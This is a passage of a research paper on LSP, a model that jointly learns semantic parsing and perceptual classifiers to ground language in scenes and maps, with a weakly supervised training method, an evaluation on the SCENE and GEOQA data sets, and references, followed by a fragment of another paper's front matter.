3: Factor graph of LSP. The environment d and language z are given as input, from which the model predicts a logical knowledge base Γ, logical form `, syntactic tree t and denotation γ. ical knowledge base Γ that assigns truth values to instances of these predicates using parameters θper. This function uses an independent classifier to pre- dict the instances of each predicate. The seman- tic parser fprs takes a natural language statement z and produces a logical form ` and syntactic parse t using parameters θprs. The logical form ` is a database query expressed in lambda calculus nota- tion, constructed by logically combining the given predicates. Finally, the evaluation function feval de- terministically evaluates the logical form ` on the knowledge base Γ to produce a denotation γ. These components are illustrated in Figure 2. The following sections describe the percep- tion function (Section 3.1), semantic parser (Sec- tion 3.2), evaluation function (Section 3.3), and in- ference (Section 3.4) in more detail. 3.1 Perception Function The perception function fper constructs a logical knowledge base Γ given an environment d. The per- ception function assumes that an environment con- tains a collection of entities e ∈ Ed. The knowl- edge base produced by perception is a collection of ground predicate instances using these entities. For example, in Figure 2a, the entire image is the envi- ronment, and each image segment is an entity. The logical knowledge base Γ contains the shown pred- icate instances, where the categories include blue, mug and table, and the relations include on-rel. The perception function scores logical knowledge bases using a set of per-predicate binary classifiers. These classifiers independently assign a score to whether each entity (entity pair) is an element of each category (relation). Let γc ∈ Γ denote the set of entities which are elements of category c; simi- larly, let γr ∈ Γ denote the set of entity pairs which are elements of the relation r. Given these sets, the score of a logical knowledge base Γ factors into per- relation and per-category scores h: fper(Γ,d; θper) = ∑ c∈C h(γc,d; θcper) + ∑ r∈R h(γr,d; θrper) The per-predicate scores are in turn given by a sum of per-element classification scores: h(γc,d; θcper) = ∑ e∈Ed γc(e)(θcper) Tφcat(e) h(γr,d; θrper) = ∑ (e1,e2)∈Ed γr(e1,e2)(θ r per) Tφrel(e1,e2) Each term in the above sums represents a single binary classification, determining the score for a sin- gle entity (entity pair) belonging to a particular cat- egory (relation). We treat γc and γr as indicator functions for the sets they denote, i.e., γc(e) = 1 for entities e in the set, and 0 otherwise. Similarly, γr(e1,e2) = 1 for entity pairs (e1,e2) in the set, and 0 otherwise. The features of these classifiers are given by φcat and φrel, which are feature functions that map entities and entity pairs to feature vectors. The parameters of these classifiers are given by θcper and θrper. The perception parameters θper contain one such set of parameters for every category and re- lation, i.e., θper = {θcper : c ∈ C}∪{θrper : r ∈ R}. 3.2 Semantic Parser The goal of semantic parsing is to identify which portions of the input natural language denote enti- ties and relationships between entities in the envi- ronment. Semantic parsing accomplishes this goal by mapping from natural language to a logical form that explicitly describes the language’s entity refer- ents using one- and two-argument predicates. The logical form is combined with instances of these predicates to produce the statement’s denotation. LSP’s semantic parser is defined using Combina- tory Categorial Grammar (CCG) (Steedman, 1996). The grammar of the parser is given by a lexicon Λ which maps words to syntactic categories and logi- cal forms. For example, “mug” may have the syn- tactic category N for noun, and the logical form λx.mug(x), denoting the set of all entities x such that mug is true. During parsing, the logical forms for adjacent phrases are combined to produce the logical form for the complete statement. 196 the N/N λf.f mugs N λx.mug(x) N : λx.mug(x) are (S\N)/N λf.λg.λx.g(x) ∧f(x) right N/PP λf.λx.∃y.right-rel(x,y) ∧f(y) of PP/N λf.f the N/N λf.f monitor N λx.monitor(x) N : λx.monitor(x) PP : λx.monitor(x) N : λx.∃y.right-rel(x,y) ∧monitor(y) S\N : λg.λx.∃y.g(x) ∧right-rel(x,y) ∧monitor(y) S : λx.∃y.mug(x) ∧right-rel(x,y) ∧monitor(y) Figure 4: Example parse of “the mugs are right of the monitor.” The first row of the derivation retrieves lexical categories from the lexicon, while the remaining rows represent applications of CCG combinators. Figure 4 illustrates how CCG parsing produces a syntactic tree t and a logical form `. The top row of the parse represents retrieving a lexicon entry for each word. Each successive row combines a pair of entries by applying a logical form to an adjacent ar- gument. A given sentence may have multiple parses like the one shown, using a different set of lexicon entries or a different order of function applications. The semantic parser scores each such parse, learning to distinguish correct and incorrect parses. The semantic parser in LSP is a linear model over CCG parses (`,t) given language z: fprs(`,t,z; θprs) = θ T prsφprs(`,t,z) Here, φprs(`,t,z) represents a feature function map- ping CCG parses to vectors of feature values. φprs factorizes according to the tree structure of the CCG parse; it contains features for local parsing opera- tions which are summed to produce the feature val- ues for a tree. If the parse tree is a terminal, then: φprs(`,t,z) = 1(lexicon entry) The notation 1(x) denotes a vector with a single one entry whose position is determined by x. The termi- nal features are indicator features for each lexicon entry, as shown in the top row of Figure 4. These features allow the model to learn the correct syntac- tic and semantic function of each word. If the parse tree is a nonterminal, then: φprs(`,t,z) = φprs(left(`,t,z)) + φprs(right(`,t,z)) + 1(combinator) These nonterminal features are defined over combi- nator rules in the parse tree, as in the remaining rows of Figure 4. These features allow the model to learn which adjacent parse trees are likely to combine. We refer the reader to Zettlemoyer and Collins (2005) for more information about CCG semantic parsing. 3.3 Evaluation Function The evaluation function feval deterministically scores denotations given a logical form ` and a logical knowledge base Γ. Intuitively, the evalu- ation function simply evaluates the query ` on the database Γ to produce a denotation. The evaluation function then assigns score 0 to this denotation, and score −∞ to all other denotations. We describe feval by giving a recurrence for com- puting the denotation γ of a logical form ` on a log- ical knowledge base Γ. This evaluation takes the form of a tree, as in Figure 2c. The base cases are: • If ` = λx.c(x) then γ = γc. • If ` = λx.λy.r(x,y), then γ = γr. The denotations for more complex logical forms are computed recursively by decomposing ` accord- ing to its logical structure. Our logical forms con- tain only conjunctions and existential quantifiers; the corresponding recursive computations are: • If ` = λx.`1(x) ∧ `2(x), then γ(e) = 1 iff γ1(e) = 1 ∧γ2(e) = 1. • If ` = λx.∃y.`1(x,y), then γ(e1) = 1 iff ∃e2.γ1(e1,e2) = 1. Note that a similar recurrence can be used to com- pute groundings: simply retain the satisfying assign- ments to existentially-quantified variables. 3.4 Inference The basic inference problem in LSP is to predict a denotation γ given language z and an environment d. This inference problem is straightforward due to the deterministic structure of feval. The highest- scoring γ can be found by independently maximiz- ing fprs and fper to find the highest-scoring logical form ` and logical knowledge base Γ. Deterministi- cally evaluating the recurrence for feval using these values yields the highest-scoring denotation. 197 Another inference problem occurs during train- ing: identify the highest-scoring logical form and knowledge base which produce a particular denota- tion. Our approximate inference algorithm for this problem is described in Section 4.2. 4 Weakly Supervised Parameter Estimation This section describes a weakly supervised training procedure for LSP, which estimates parameters us- ing a corpus of sentences with annotated denota- tions. The algorithm jointly trains both the pars- ing and the perception components of LSP to best predict the denotations of the observed training sen- tences. Our approach trains LSP as a maximum margin Markov network using the stochastic subgra- dient method. The main difficulty is computing the subgradient, which requires computing values for the model’s hidden variables, i.e., the logical knowl- edge base Γ and semantic parse ` that are responsi- ble for the model’s prediction. 4.1 Stochastic Subgradient Method The training procedure trains LSP as a maximum margin Markov network (Taskar et al., 2004), a structured analog of a support vector machine. The training data for our weakly supervised algorithm is a collection {(zi,γi,di)}ni=1, consisting of language zi paired with its denotation γi in environment di. Given this data, the parameters θ = [θprs,θper] are estimated by minimizing the following objective function: O(θ) = λ 2 ||θ||2 + 1 n [ n∑ i=1 ζi ] (1) where λ is a regularization parameter that controls the trade-off between model complexity and slack penalties. The slack variable ζi represents a margin violation penalty for the ith training example, de- fined as: ζi = max γ,Γ,`,t [ f(γ, Γ,`,t,zi,di; θ) + cost(γ,γi) ] − max Γ,`,t f(γi, Γ,`,t,zi,di; θ) The above expression is the structured counterpart of the hinge loss, where cost(γ,γi) is the margin by which γi’s score must exceed γ’s score. We let cost(γ,γi) be the Hamming cost; it adds a cost of 1 for each entity e such that γi(e) 6= γ(e). We optimize this objective using the stochastic subgradient method (Ratliff et al., 2006). To com- pute the subgradient gi, first compute the highest- scoring assignments to the model’s hidden variables: γ̂, Γ̂, ˆ̀, t̂ ←arg max γ,Γ,`,t f(γ, Γ,`,t,zi,di; θj) + cost(γ,γi) (2) Γ∗,`∗, t∗ ←arg max Γ,`,t f(γi, Γ,`,t,zi,di; θj) (3) The first set of values (e.g., ˆ̀) are the best ex- planation for the denotation γ̂ which most violates the margin constraint. The second set of values (e.g., `∗) are the best explanation for the true de- notation γi. The subgradient update increases the weights of features that explain the true denotation, while decreasing the weights of features that explain the denotation violating the margin. The subgradi- ent factors into parsing and perception components: gi = [giprs,g i per]. The parsing subgradient is: giprs = φprs( ˆ̀, t̂,zi) − φprs(`∗, t∗,zi) The subgradient of the perception parameters θper factors into subgradients of the category and relation classifier parameters. Recall that θper = {θcper : c ∈ C}∪{θrper : r ∈ R}. Let γ̂c ∈ Γ̂ be the best margin- violating set of entities for c, and γc∗ ∈ Γ∗ be the best truth-explaining set of entities. Similarly define γ̂r and γr∗. The subgradients of the category and relation classifier parameters are: gi,cper = ∑ e∈E di (γ̂c(e) −γc∗(e)) φcat(e) gi,rper = ∑ (e1,e2)∈Edi (γ̂r(e1,e2) −γr∗(e1,e2)) φrel(e1,e2) 4.2 Inference: Computing the Subgradient Solving the maximizations in Equations 2 and 3 is challenging because the weights placed on the de- notation γ couple fprs and fper. Due to this cou- pling, exactly solving these problems requires (1) enumerating all possible logical forms `, and (2) for each logical form, finding the highest-scoring logi- cal knowledge base Γ by propagating the weights on γ back through feval. We use a two-step approximate inference algo- rithm for both maximizations. The first step per- forms a beam search over CCG parses, producing 198 k possible logical forms `1, ...,`k. The second step uses an integer linear program (ILP) to find the best logical knowledge base Γ given each parse `i. In our experiments, we parse with a beam size of 1000, then solve an ILP for each of the 10 highest-scoring logical forms. The highest-scoring parse/logical knowledge base pair is the approximate maximizer. Given a logical form ` output by beam search, the second step of inference computes the best values for the logical knowledge base Γ and denotation γ: max Γ,γ fper(Γ,d; θper) + feval(γ,`, Γ) + ψ(γ) (4) Here, ψ(γ) = ∑ e∈Ed ψeγ(e) represents a set of weights on the entities in the predicted denotation γ. For Equation 2, ψ represents cost(γ,γi). For Equa- tion 3, ψ is a hard constraint encoding γ = γi (i.e., ψ(γ) = −∞ when γ 6= γi and 0 otherwise). We encode the maximization in Equation 4 as an ILP. For each category c and relation r, we create bi- nary variables γc(e1) and γr(e1,e2) for each entity in the environment, e1,e2 ∈ Ed. We similarly create binary variables γ(e) for the denotation γ. Using the fact that fper is a linear function of these variables, we write the ILP objective as: fper(Γ,d; θper) + ψ(γ) = ∑ e1∈Ed ∑ c∈C wce1γ c(e1) + ∑ e1,e2∈Ed ∑ r∈R wre1,e2γ r(e1,e2) + ∑ e1∈Ed ψe1γ(e1) where the weights wce1 and w r e1,e2 determine how likely it is that each entity or entity pair belongs to the predicates c and r: wce1 = (θ c per) Tφcat(e1) wre1,e2 = (θ r per) Tφrel(e1,e2) The ILP also includes constraints and additional auxiliary variables that represent feval. These con- straints couple the denotation γ and the logical knowledge base Γ such that γ is the result of evaluat- ing ` on Γ. ` is recursively decomposed as in Section 3.3, and each intermediate set of entities in the recur- rence is given its own set of |Ed| (or |Ed|2) variables. These variables are then logically constrained to en- force `’s structure. 5 Evaluation Our evaluation performs three major comparisons. First, we examine the performance impact of weakly supervised training by comparing weakly and fully supervised variants of LSP. Second, we examine the performance impact of modelling relations by com- paring against a category-only baseline, which is an ablated version of LSP similar to the model of Ma- tuszek et al. (2012). Finally, we examine the causes of errors by performing an error analysis of LSP’s semantic parser and perceptual classifiers. Before describing our results, we first describe some necessary set-up for the experiments. These sections describe the data sets, features, construc- tion of the CCG lexicon, and details of the models. Our data sets and additional evaluation resources are available online from http://rtw.ml.cmu.edu/ tacl2013_lsp/. 5.1 Data Sets We evaluate LSP on two applications: scene un- derstanding (SCENE) and geographical question an- swering (GEOQA). These data sets are collections {(zi,γi,di,`i, Γi)}ni=1, consisting of a number of natural language statements zi with annotated deno- tations γi in environments di. For fully supervised training, each statement is annotated with a gold standard logical form `i, and each environment with a gold standard logical knowledge base Γi. Statistics of these data sets are shown in Table 1, and example environments and statements are shown in Figure 5. The SCENE data set consists of segmented images of indoor environments containing a number of or- dinary objects such as mugs and monitors. Each image is an environment, and each image segment (bounding box) is an entity. We collected natural language descriptions of each scene from members of our lab and Amazon Mechanical Turk, asking subjects to describe the objects in each scene. The authors then manually annotated the collected state- ments with their denotations and logical forms. In this data set, each image contains the same set of ob- jects; note that this does not trivialize the task, as the model only observes visual features of the objects, which are not consistent across environments. The GEOQA data set consists of several maps containing entities such as cities, states, national parks, lakes and oceans. Each map is an envi- ronment, and its component entities are given by polygons of latitude/longitude coordinates marking 199 Data Set Statistics SCENE GEOQA # of environments 15 10 Mean entities / environment d 4.1 6.9 Mean # of entities in denotation γ 1.5 1.2 # of statements 284 263 Mean words / statement 6.3 6.3 Mean predicates / log. form 2.6 2.8 # of preds. in annotated worlds 46 38 Lexicon Statistics # of words in lexicon 169 288 # of lexicon entries 712 876 Mean parses / statement 15.0 8.9 Table 1: Statistics of the two data sets used in our evaluation, and of the generated lexicons. their boundaries.3 Furthermore, each entity has one known name (e.g., “Greenville”). In this data set, distinct entities occur on average in 1.25 environ- ments; repeated entities are mostly large locations, such as states and oceans. The language for this data set was contributed by members of our research group, who were instructed to provide a mixture of simple and complex geographical questions. The authors then manually annotated each question with a denotation (its answer) and a logical form. 5.2 Features The features of both applications are intended to capture properties of entities and relations between them. As such, both applications share a set of phys- ical features which are functions of the bounding polygons of each entity. Example category features (φcat) are the area and perimeter of the entity, and an example relation feature (φrel) is the distance be- tween entity centroids. The SCENE data set additionally includes visual appearance features in φcat to capture visual proper- ties of objects. These features include a Histogram of Oriented Gradients (HOG) (Dalal and Triggs, 2005) and an RGB color histogram. The GEOQA data set additionally includes dis- tributional semantic features to distinguish between different types of entities (e.g., states vs. lakes) and to capture non-spatial relations (e.g., capitals of states). These features are derived from phrase co-occurrences with entity names in the Clueweb09 3Polygons were extracted from OpenStreetMap, http:// www.openstreetmap.org/. web corpus.4 The category features φcat include in- dicators for the 20 contexts which most frequently occur with an entity’s name (e.g., “X is a city”). Similarly, the relation features φrel include indica- tors for the 20 most frequent contexts between two entities’ names (e.g., “X in eastern Y ”). 5.3 Lexicon Induction One of the inputs to the semantic parser (Section 3.2) is a lexicon that lists possible syntactic and seman- tic functions for each word. Together, these per- word entries define the set of possible logical forms for every statement. Each word may have mul- tiple lexicon entries to capture uncertainty about its meaning. For example, the word “right” may have entries N : λx.right(x) and N/PP : λf.λx.∃y.right-rel(x,y) ∧f(y). The semantic parser learns to distinguish among these interpreta- tions to produce good logical forms. We automatically generated lexicons for both applications using part-of-speech tag heuristics.5 These heuristics map words to lexicon entries con- taining category and relation predicates derived from the word’s lemma. Nouns and adjectives pro- duce lexicon entries containing either categories or relations (as shown above for “right”). Mapping these parts-of-speech to relations is necessary for phrases like “to the right of,” where the noun “right” denotes a relation. Verbs and prepositions pro- duce lexicon entries containing relations. Additional heuristics generate semantically-empty lexicon en- tries, allowing words like determiners to have no physical interpretation. Finally, there are special heuristics for forms of “to be” and, in GEOQA, to handle known entity names. The complete set of lexicon induction heuristics is available online. The automatically generated lexicon makes it dif- ficult to compare semantic parses across models, since the correctness of a semantic parse depends on the learned perceptual classifiers. To facilitate such a comparison (Section 5.6), we filtered out lexicon entries containing predicates which were not used in any of the annotated logical forms. Statistics of the filtered lexicons are shown in Table 1. 4http://www.lemurproject.org/clueweb09/ 5We used the Stanford POS tagger (Toutanova et al., 2003). 200 Environment d Language z and predicted logical form ` Predicted grounding True grounding monitor to the left of the mugs {(2,1), (2,3)} {(2,1), (2,3)} λx.∃y.monitor(x) ∧ left-rel(x,y) ∧ mug(y) mug to the left of the other mug {(3,1)} {(3,1)} λx.∃y.mug(x) ∧ left-rel(x,y) ∧ mug(y) objects on the table {(1,4), (2,4) {(1,4), (2,4), λx.∃y.object(x) ∧ on-rel(x,y) ∧ table(y) (3,4)} (3,4)} two blue cups are placed near to the computer screen {(1)} {(1,2), (3,2)} λx.blue(x) ∧ cup(x) ∧ comp.(x) ∧ screen(x) What cities are in North Carolina? {(CH,NC), (GB,NC) {(CH,NC), (GB,NC) λx.∃y.city(x) ∧ in-rel(x,y) ∧ y = NC (RA,NC)} (RA,NC)} What city is east of Greensboro in North Carolina? {(RA,GB,NC), {(RA,GB,NC)} λx.∃y,z.city(x) ∧ east-rel(x,y) (MB,GB,NC)} ∧ y = GB ∧ in-rel(y,z) ∧ z = NC What cities are on the ocean? {(CH,AO), (GB,AO), {(MB,AO)} λx.∃y.city(x) ∧ on-rel(x,y) ∧ ocean(y) (MB,AO), (RA,AO)} Figure 5: Example environments, statements, and model predictions from the SCENE and GEOQA data sets. 5.4 Models and Training The evaluation compares three models. The first model is LSP-W, which is LSP trained using the weakly supervised algorithm described in Section 4. The second model, LSP-CAT, replicates the model of Matuszek et al. (2012) by restricting LSP to use category predicates. LSP-CAT is constructed by removing all relation predicates in lexicon entries, mapping entries like λf.λg.λx.∃y.r(x,y) ∧ g(x) ∧ f(y) to λf.λg.λx.∃y.g(x) ∧ f(y). This model is also trained using our weakly supervised algorithm. The third model, LSP-F, is LSP trained with full supervision, using the manually annotated semantic parses and logical knowledge bases in our data sets. Given these annotations, training LSP amounts to independently training a semantic parser (using sen- tences with annotated logical forms, {(zi,`i)}) and a set of perceptual classifiers (using environments with annotated logical knowledge bases, {(di, Γi)}). This model measures the performance achievable with LSP given significantly more supervision. All three variants of LSP were trained using the same hyperparameters. For SCENE, we computed subgradients in 5 example minibatches and per- formed 100 passes over the data using λ = 0.03. For GEOQA, we computed subgradients in 8 example minibatches, again performing 100 passes over the data using λ = 0.02. We tried varying the regular- ization parameter, but found that performance was relatively stable under λ ≤ 0.05. All experiments use leave-one-environment-out cross-validation to estimate model performance. We hold out each en- vironment in turn, train each model on the remaining environments, then test on the held-out environment. 5.5 Results We consider two prediction problems in the eval- uation. The first problem is to predict the correct denotation γi for a statement zi in an environment di. A correct prediction on this task corresponds to a correctly answered question. A weakness of this task is that it is possible to guess the right de- notation without fully understanding the language. For example, given a query like “mugs on the ta- ble,” it might be possible to guess the denotation based solely on “mugs,” ignoring “table” altogether. The grounding prediction task corrects for this prob- lem. Here, each model predicts a grounding, which is the set of all satisfying assignments to the vari- ables in a logical form. For example, for the log- ical form λx.∃y.left-rel(x,y) ∧ mug(y), the grounding is the set of (x,y) tuples for which both left-rel(x,y) and mug(y) return true. Note that, if the predicted semantic parse is incorrect, the predicted grounding for a statement may contain a different number of variables than the true ground- ing; such groundings are incorrect. Figure 5 shows model predictions for the grounding task. Performance on both tasks is measured using ex- act match accuracy. This metric is the fraction of examples for which the predicted set of entities (be it the denotation or grounding) exactly equals the annotated set. This is a challenging metric, as the 201 Denotation γ 0 rel. 1 rel. other total LSP-CAT 0.94 0.45 0.20 0.51 LSP-F 0.89 0.81 0.20 0.70 LSP-W 0.89 0.77 0.16 0.67 Grounding g 0 rel. 1 rel. other total LSP-CAT 0.94 0.37 0.00 0.42 LSP-F 0.89 0.80 0.00 0.65 LSP-W 0.89 0.70 0.00 0.59 % of data 23 56 21 100 (a) Results on the SCENE data set. Denotation γ 0 rel. 1 rel. other total LSP-CAT 0.22 0.19 0.07 0.17 LSP-F 0.64 0.53 0.21 0.48 LSP-W 0.64 0.58 0.21 0.51 Grounding g 0 rel. 1 rel. other total LSP-CAT 0.22 0.19 0.00 0.16 LSP-F 0.64 0.53 0.17 0.47 LSP-W 0.64 0.58 0.15 0.50 % of data 8 72 20 100 (b) Results on the GEOQA data set. Table 2: Model performance on the SCENE and GEOQA datasets. LSP-CAT is an ablated version of LSP that only learns categories (similar to Matuszek et al. (2012)), LSP-F is LSP trained with annotated seman- tic parses and logical knowledge bases, and LSP-W is LSP trained on sentences with annotated denotations. Results are separated by the number of relations in each test natural language statement. number of possible sets grows exponentially in the number of entities in the environment. Say an en- vironment has 5 entities and a logical form has two variables; then there are 25 possible denotations and 225 possible groundings. To quantify this difficulty, note that selecting a denotation uniformly at random achieves 6% accuracy on SCENE, and 1% accuracy on GEOQA; selecting a random grounding achieves 1% and 0% accuracy, respectively. Table 2 shows results for both applications us- ing exact match accuracy. To better understand the performance of each model, we break down perfor- mance according to linguistic complexity. We com- pute the number of relations in the annotated logical form for each statement, and show separate results for 0 and 1 relations. We also include an “other” category to capture sentences with more than one relation (very infrequent), or that include quanti- fiers, comparatives, or other linguistic phenomena not captured by LSP. The results from these experiments suggest three conclusions. First, we find that modelling relations is important for both applications, as (1) the major- ity of examples contain relational language, and (2) LSP-W and LSP-F dramatically outperform LSP- CAT on these examples. The low performance of LSP-CAT suggests that many denotations cannot be predicted from only the first noun phrase in a statement, demonstrating that both applications re- quire an understanding of relations. Second, we find that weakly supervised training and fully supervised training perform similarly, with accuracy differences in the range of 3%-6%. Finally, we find that LSP-W performs similarly on both the denotation and com- plete grounding tasks; this result suggests that when LSP-W predicts a correct denotation, it does so be- cause it has identified the correct entity referents of each portion of the statement. 5.6 Component Error Analysis We performed an error analysis of each model com- ponent to better understand the causes of errors. Ta- ble 3 shows the accuracy of the semantic parser from each trained model. Each held-out sentence zi is parsed to produce a logical form `, which is marked correct if it exactly matches our manual annotation `i. A correct logical form implies a correct ground- ing for the statement when the parse is evaluated in the gold standard logical knowledge base. These re- sults show that both LSP-W and LSP-F have rea- sonably accurate semantic parsers, given the restric- tions on possible logical forms. Common mistakes include missing lexicon entries (e.g., “borders” is POS-tagged as a noun, so the GEOQA lexicon does not include a verb for it) and prepositional phrase attachments (e.g., 6th example in Figure 5). Table 4 shows the precision and recall of the in- dividual perceptual classifiers. We computed these metrics by comparing each annotated predicate in the held-out environment with the model’s predic- tions for the same predicate, treating each entity (or entity pair) as an independent example for classifi- 202 SCENE GEOQA LSP-CAT 0.21 0.17 LSP-W 0.72 0.71 LSP-F 0.73 0.75 Upper Bound 0.79 0.87 Table 3: Accuracy of the semantic parser from each trained model. Upper bound is the highest accu- racy achievable without modelling comparatives and other linguistic phenomena not captured by LSP. cation. Fully supervised training appears to produce better perceptual classifiers than weakly supervised training; however, this result conflicts with the full system evaluation in Table 2, where both systems perform equally well. There are two causes for this phenomenon: uninformative adjectives and unim- portant relation instances. Uninformative adjective predicates are responsi- ble for the low performance of the category classi- fiers in SCENE. Phrases like “LCD screen” in this domain are annotated with logical forms such as λx.lcd(x) ∧ screen(x). Here, lcd is uninfor- mative, since screen already denotes a unique ob- ject in the environment. Therefore, it is not impor- tant to learn an accurate classifier for lcd. Weakly supervised training learns that lcd is meaningless, yet predicts the correct denotation for λx.lcd(x) ∧ screen(x) using its screen classifier. The discrepancy in relation performance occurs because the relation evaluation weights every rela- tion equally, whereas in reality some relations are more frequent. Furthermore, even within a single relation, each entity pair is not equally important – for example, people tend to ask what is in a state, but not what is in an ocean. To account for these factors, we define a reweighted relation metric using the an- notated logical forms containing only one relation, of the form λx.∃y.c1(x) ∧ r(x,y) ∧ c2(y). Using these logical forms, we measure the performance of r on the set of x,y pairs such that c1(x)∧c2(y), then average this over all examples. Table 4 shows that, using this metric, both training regimes have similar performance. This result suggests that weakly su- pervised training adapts LSP’s relation classifiers to the relation instances which are empirically impor- tant for grounding natural language. SCENE GEOQA Categories P R F1 P R F1 LSP-CAT 0.40 0.86 0.55 0.78 0.25 0.38 LSP-W 0.40 0.84 0.54 0.85 0.63 0.73 LSP-F 0.98 0.96 0.97 0.89 0.63 0.74 Relations P R F1 P R F1 LSP-W 0.40 0.42 0.41 0.34 0.51 0.41 LSP-F 0.99 0.87 0.92 0.70 0.46 0.55 Relations (rw) P R F1 P R F1 LSP-W 0.98 0.98 0.98 0.86 0.72 0.79 LSP-F 0.98 0.95 0.96 0.89 0.66 0.76 Table 4: Perceptual classifier performance, mea- sured against the gold standard logical knowledge bases. LSP-CAT is excluded from the relation eval- uations, since it does not learn relations. Relations (rw) is the reweighted metric (see text for details). 6 Conclusions This paper introduces Logical Semantics with Per- ception (LSP), a model for mapping natural lan- guage statements to their referents in a physical en- vironment. LSP jointly models perception and lan- guage understanding, simultaneously learning (1) to map from environments to logical knowledge bases containing instances of both one-argument categories and two-argument relations, and (2) to semantically parse natural language. Furthermore, we introduce a weakly supervised training proce- dure that trains LSP using only sentences with anno- tated denotations, without annotated semantic parses or noun phrase/entity mappings. An experimen- tal evaluation reveals that this procedure performs nearly as well fully supervised training, while re- quiring significantly less annotation effort. Our ex- periments also find that LSP’s ability to learn rela- tions improves performance over comparable prior work (Matuszek et al., 2012). Acknowledgments This research has been supported in part by DARPA under award FA8750-13-2-0005, and in part by a gift from Google. We also gratefully acknowledge the CMU Read the Web group for assistance with data set construction, and Tom Mitchell, Manuela Veloso, Brendan O’Connor, Felix Duvallet, Robert Fisher and the anonymous reviewers for helpful dis- cussions and comments on the paper. 203 References Rehj Cantrell, Matthias Scheutz, Paul Schermerhorn, and Xuan Wu. 2010. Robust spoken instruc- tion understanding for HRI. In Proceedings of the 5th ACM/IEEE International Conference on Human- Robot Interaction. David L. Chen and Raymond J. Mooney. 2008. Learning to sportscast: a test of grounded language acquisition. In Proceedings of the 25th International Conference on Machine learning. David L. Chen and Raymond J. Mooney. 2011. Learn- ing to interpret natural language navigation instruc- tions from observations. In Proceedings of the 25th AAAI Conference on Artificial Intelligence. James Clarke, Dan Goldwasser, Ming-Wei Chang, and Dan Roth. 2010. Driving semantic parsing from the world’s response. In Proceedings of the Four- teenth Conference on Computational Natural Lan- guage Learning. Navneet Dalal and Bill Triggs. 2005. Histograms of oriented gradients for human detection. In Proceed- ings of the 2005 IEEE Computer Society Conference on Computer Vision and Pattern Recognition. Juraj Dzifcak, Matthias Scheutz, Chitta Baral, and Paul Schermerhorn. 2009. What to do and how to do it: translating natural language directives into tempo- ral and dynamic logic representation for goal manage- ment and action execution. In Proceedings of the 2009 IEEE International Conference on Robotics and Au- tomation. Kai-yuh Hsiao, Nikolaos Mavridis, and Deb Roy. 2003. Coupling perception and simulation: Steps towards conversational robotics. In Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems. Rohit J. Kate and Raymond J. Mooney. 2006. Using string-kernels for learning semantic parsers. In Pro- ceedings of the 21st International Conference on Com- putational Linguistics and the 44th annual meeting of the ACL. Rohit J. Kate and Raymond J. Mooney. 2007. Learning language semantics from ambiguous supervision. In Proceedings of the 22nd Conference on Artificial In- telligence. Thomas Kollar, Stefanie Tellex, Deb Roy, and Nicholas Roy. 2010. Toward understanding natural language directions. In Proceedings of the 5th ACM/IEEE In- ternational Conference on Human-Robot Interaction. Jayant Krishnamurthy and Tom M. Mitchell. 2012. Weakly supervised training of semantic parsers. In Proceedings of the 2012 Joint Conference on Empir- ical Methods in Natural Language Processing and Computational Natural Language Learning. Geert-Jan M. Kruijff, Hendrik Zender, Patric Jensfelt, and Henrik I. Christensen. 2007. Situated dialogue and spatial organization: What, where... and why. In- ternational Journal of Advanced Robotic Systems. Tom Kwiatkowski, Luke Zettlemoyer, Sharon Goldwa- ter, and Mark Steedman. 2010. Inducing probabilistic CCG grammars from logical form with higher-order unification. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing. Michael Levit and Deb Roy. 2007. Interpretation of spa- tial language in a map navigation task. IEEE Transac- tions on Systems, Man, and Cybernetics, Part B. Percy Liang, Michael I. Jordan, and Dan Klein. 2011. Learning dependency-based compositional semantics. In Proceedings of the Association for Computational Linguistics. Matthew MacMahon, Brian Stankiewicz, and Benjamin Kuipers. 2006. Walk the talk: connecting language, knowledge, and action in route instructions. In Pro- ceedings of the 21st National Conference on Artificial Intelligence. Cynthia Matuszek, Dieter Fox, and Karl Koscher. 2010. Following directions using statistical machine transla- tion. In Proceedings of the 5th ACM/IEEE Interna- tional Conference on Human-Robot Interaction. Cynthia Matuszek, Nicholas FitzGerald, Luke Zettle- moyer, Liefeng Bo, and Dieter Fox. 2012. A joint model of language and perception for grounded at- tribute learning. In Proceedings of the 29th Interna- tional Conference on Machine Learning. Nathan D. Ratliff, J. Andrew Bagnell, and Martin A. Zinkevich. 2006. (online) subgradient methods for structured prediction. Artificial Intelligence and Statistics. Deb Roy, Kai-Yuh Hsiao, and Nikolaos Mavridis. 2003. Conversational robots: building blocks for grounding word meaning. In Proceedings of the HLT-NAACL 2003 Workshop on Learning Word Meaning from Non- linguistic Data. Nobuyuki Shimizu and Andrew Haas. 2009. Learning to follow navigational route instructions. In Proceedings of the 21st international joint conference on artifical intelligence. Marjorie Skubic, Dennis Perzanowski, Sam Blisard, Alan Schultz, William Adams, Magda Bugajska, and Derek Brock. 2004. Spatial language for human-robot di- alogs. IEEE Transactions on Systems, Man, and Cy- bernetics, Part C: Applications and Reviews. Mark Steedman. 1996. Surface Structure and Interpre- tation. Ben Taskar, Carlos Guestrin, and Daphne Koller. 2004. Max-margin markov networks. In Advances in Neural Information Processing Systems. 204 Stefanie Tellex, Thomas Kollar, Steven Dickerson, Matthew Walter, Ashis Banerjee, Seth Teller, and Nicholas Roy. 2011. Understanding natural language commands for robotic navigation and mobile manipu- lation. In AAAI Conference on Artificial Intelligence. Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic dependency network. In Pro- ceedings of the 2003 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics on Human Language Technology. Terry Winograd. 1970. Procedures as a representation for data in a computer program for understanding nat- ural language. Ph.D. thesis, Massachusetts Institute of Technology. Yuk Wah Wong and Raymond J. Mooney. 2006. Learn- ing for semantic parsing with statistical machine trans- lation. In Proceedings of the main conference on Hu- man Language Technology Conference of NAACL. John M. Zelle and Raymond J. Mooney. 1996. Learn- ing to parse database queries using inductive logic pro- gramming. In Proceedings of the Thirteenth National Conference on Artificial Intelligence. Luke S. Zettlemoyer and Michael Collins. 2005. Learn- ing to map sentences to logical form: Structured clas- sification with probabilistic categorial grammars. In Proceedings of the 21st Conference in Uncertainty in Artificial Intelligence. 205 206 work_jr7irs7m6vg3lk2k6coje4kbgu ---- Submitted 2 April 2019 Accepted 14 October 2019 Published 11 November 2019 Corresponding author Indika Kahanda, indika.kahanda@montana.edu Academic editor Christopher Mungall Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.233 Copyright 2019 Manuweera et al. Distributed under Creative Commons CC-BY 4.0 OPEN 